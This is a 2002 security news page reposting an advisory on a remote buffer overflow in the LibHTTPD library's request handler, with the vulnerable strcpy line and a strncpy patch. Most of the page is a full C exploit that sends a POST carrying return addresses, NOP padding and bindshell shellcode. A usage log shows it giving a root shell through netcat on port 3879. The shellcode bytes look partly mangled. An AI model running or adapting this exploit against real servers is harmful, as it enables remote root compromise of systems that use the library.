Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » Remote Buffer Overflow vulnerability in Lib HTTPd

Remote Buffer Overflow vulnerability in Lib HTTPd

by Nikola Strahija on November 13th, 2002 LibHTTPD can be used to add basic web server capabilities to an application or embedded device. Detailed contents desire to reference lower part homepage. :-) If examine 'api.c' of library libhttpd.a source code, can find vulnerability. Can see httpdProcessRequest() in line:860


860 void httpdProcessRequest(server)
861 httpd *server;
862 {
863 char dirName[HTTP_MAX_URL],
...
869 server->response.responseLength = 0;
870 strcpy(dirName, httpdRequestPath(server)); // here.
--

Herewith, fatal vulnerability that can execute rootshell in remote happens.


0x02. Vulnerable Packages


Vendor site: http://www.hughes.com.au/products/libhttpd/

libhttpd-1.2
-libhttpd-1.2.tar.gz
+Linux
+Other


0x03. Exploit


This's exploit code that prove.
Through remote attack, get 'root' competence.

Use netcat for very easy exploit.

To do simple explanation about exploit.
Through POST, insert much &shellcode address.
Put next nop,shellcode.
(Port:3879 bindshell code)


=== 0x82-Remote.libhttpdxpl.c ===

/*
**
** Lib HTTPd Remote Buffer Overflow exploit
** by Xpl017Elz
** __
** Testing exploit:
**
** bash$ (./0x82-Remote.libhttpdxpl;cat)|nc libhttphost 80
**
** (Ctrl+c)
** punt!
** bash$ nc libhttphost 3879
** uname
** Linux
** id
** uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),
** 3(sys),4(adm),6(disk),10(wheel)
** exit
** bash$
**
** --
** exploit by "you dong-hun"(Xpl017Elz), .
** My World: http://x82.i21c.net
**
*/

#include
int main(/* args? */)
{
int shadd2r;
char b1ndsh[] = /* 129byte bindshellcode */
"2113451322262f2113201311211313C211]370C211]364K211M374215M"
"3643152001311211E364Cf211]354f307E35617'211M360215E354211E"
"370306E37420211320215M364315200211320CC315200211320C315"
"2002113031311262?211320315200211320A31520035330^211u"
"b1300210F07211Ef26013211363215Mb215Uf315200350343377"
"377377/bin/sh";
//--- POST &shellcode ---//
fprintf(stdout,"POST ");
for(shadd2r=0;shadd2r<0x408;shadd2r+=4)
{/* rEDhAT Default: 0x804e482,
Debian Address? */
fprintf(stdout,"20234404b");
}
fprintf(stdout,"rn");
//--- NOP,shellcode ---//
for(shadd2r=0;shadd2r<0x3e8;shadd2r++)
{/* SSSSSSSS...SSSSSSSSS;;; */
fprintf(stdout,"S");
}
fprintf(stdout,"%srnx0xrnx82rnl0lrn",b1ndsh);
}

=== eof ===


0x04. Patch


=== api.patch ===

--- api.c Sat Nov 9 20:06:30 2002
+++ api.patch.c Sat Nov 9 20:05:33 2002
@@ -867,7 +867,7 @@
httpContent *entry;

server->response.responseLength = 0;
- strcpy(dirName, httpdRequestPath(server));
+ strncpy(dirName, httpdRequestPath(server), HTTP_MAX_URL);
cp = rindex(dirName, '/');
if (cp == NULL)
{

=== eof ===

--



Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »